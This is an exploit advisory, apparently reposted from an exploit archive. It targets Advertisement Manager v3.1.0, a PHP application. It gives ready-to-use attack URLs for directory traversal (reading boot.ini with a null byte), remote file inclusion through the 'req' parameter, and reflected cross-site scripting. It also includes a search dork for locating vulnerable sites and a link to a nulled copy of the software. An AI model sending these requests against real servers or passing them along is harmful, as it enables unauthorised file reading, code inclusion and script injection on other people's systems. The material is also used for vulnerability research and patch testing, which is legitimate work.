Advertisement Manager v3.1.0 Multiple Vulnerabilities

Posted on 29 March 2010
=====================================================
Advertisement Manager v3.1.0 Multiple Vulnerabilities
=====================================================

===========================================================================
=============
| # Title : AdvertisementManager v3.1.0 Multti Vulnerability
| # Author : indoushka

| # email : indoushka@hotmail.com

| # Home : www.iq-ty.com/vb

| # Script Home :
http://www.ziddu.com/download/7950525/advertisement-manager-v3.1.0-php-null
ed.rar.html

| # Dork : AdvertisementManager v3.1.0 (Copyright © 2000-2004
AdvertisementManager.com. All rights reserved. )

| # Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais
v.(9.4 Ubuntu)
| # Bug : Mullti

====================== Exploit By indoushka
=================================
# Exploit :

1- Directory traversal (Windows)

http://127.0.0.1/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka
&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00

2- File inclusion

http://127.0.0.1/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka
&savelogin=on&admin=Enter&req=http://127.0.0.1/c.txt?

3- XSS

http://127.0.0.1/Advertisement/cgi/index.php?usr=%00'"><ScRiPt%20%0a%0d>al
ert(213771818860)%3B</ScRiPt>&passw=indoushka&savelogin=off&admin=Cancel&re
q=admin_login



# Inj3ct0r.com [2010-03-29]
TOP
Malware :

Last 20
Exploits :

Last 20